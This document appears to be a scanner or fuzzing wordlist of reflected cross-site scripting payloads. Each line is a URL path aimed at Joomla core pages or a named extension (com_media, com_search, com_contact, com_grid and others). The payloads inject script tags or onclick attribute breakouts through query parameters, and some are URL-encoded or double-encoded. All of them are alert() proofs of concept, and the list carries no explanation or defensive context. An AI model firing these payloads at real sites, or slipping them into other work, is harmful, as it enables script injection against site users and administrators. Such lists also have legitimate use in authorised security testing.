/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(/xss/)</script>
/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(/xss/)</script>
/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%252f%2578%2573%2573%252f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 
/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20onclick=%22alert(%27xss%27)%22%20data-xss=%22xss%22%20type=%22text%22%20x=%22&option=com_charts
/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onclick="alert('xss')"+data-xss="xss">&option=com_find
/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:100vw;height:100vh;position:absolute;left:0;top:0"+data-xss="xss"+onclick="alert('xss')&search=Search
/administrator/index.php?option=com_categories&extension=com_content%20%22onclick=%22alert%28%27xss%27%29%22data-xss=%22xss%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onclick=%22alert%28%27xss%27%29%22data-xss=%22xss%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onclick=%22alert%28%27xss%27%29%22data-xss=%22xss%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
/index.php?option=com_resman&task=list&city=<body%20onclick="alert('xss')"%20data-xss="xss">
/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1"><script>alert(/xss/)</script>
/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/xss/)</script>
/index.php?option=com_newsfeeds&view=category&id=17&whateverehere="><script>alert(/xss/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
/index.php?option="><script>alert(/xss/)</script>&task=reset.request
/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onclick=%22alert%28%27xss%27%29%22%20data-xss=%22xss%22%20style=%22position:fixed;top:0;left:0;width:100px;height:100px;%22
/index.php?option=btg_oglas&id=<script>alert(/xss/)</script>
/index.php?option=com_trade&task=product_info&Itemid=florix&PID="><script>alert(/xss/)</script>
/index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search="><script>alert(/xss/)</script>
/index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp="><script>alert(/xss/)</script>
/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/xss/)</script>
/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
/index.php?option=com_tienda&task=verproducto&categoria="><script>alert(/xss/)</script>
/index.php?option=com_noticia&action=view&itemId="><script>alert(/xss/)</script>
/index.php?option=com_trabalhe_conosco&&Itemid="><script>alert(/xss/)</script>
/index.php?option=com_facileforms&Itemid="><script>alert(/xss/)</script>
/index.php?option=com_qpersonel&task=sirala&personel_sira="><script>alert(/xss/)</script>
/index.php?option=com_oprykningspoint_mc&Itemid="><script>alert(/xss/)</script>
/index.php?option=com_carman&msg="><script>alert(/xss/)</script>
/index.php/inicio?yt_color=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
/index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00&#039;%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
/%3Cscript%3Ealert(/xss/)%3C/script%3E
/1";<script>alert(/xss/)</script>//
/page?";<script>alert(/xss/)</script>//
/index.php?option=com_hbssearch&task=showhoteldetails&id=118&adult=2<script>alert(/xss/)</script>&child=0&r_type=1&chkin=2009-09-15&chkout=2009-09-16&datedif=1&str_day=Tue&end_day=Wed&start_day=Tue&star=
/components/com_aclassf/gmap.php?addr="><script>alert(/xss/)</script>
/?theme_header=%22%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?theme_background=%22%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?theme_elements=%22%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?logoType=1&logoText=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?logoType=1&sloganText=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?excludeModules=%27;%3C%2Fscript%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E%3Cscript%3E%20var%20b=%27
/?rightCollapseDefault=%27;%3C%2Fscript%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E%3Cscript%3E%20var%20b=%27
/?ja_font=%22%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
/?option=com_beamospetition&func=sign&pet="><script>alert(/xss/)</script>
/index.php?option=com_letterman&task=view&id=1&Itemid=1"><script>alert(/xss/)</script>
/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onclick="alert('xss')"+data-xss="xss">
/?layout=modal&option=com_jooproperty&product_id=%22%20onclick%3d%22alert%28%27xss%27%29%22%20data-xss%3d%22xss%22%20bad%3d%22&view=booking



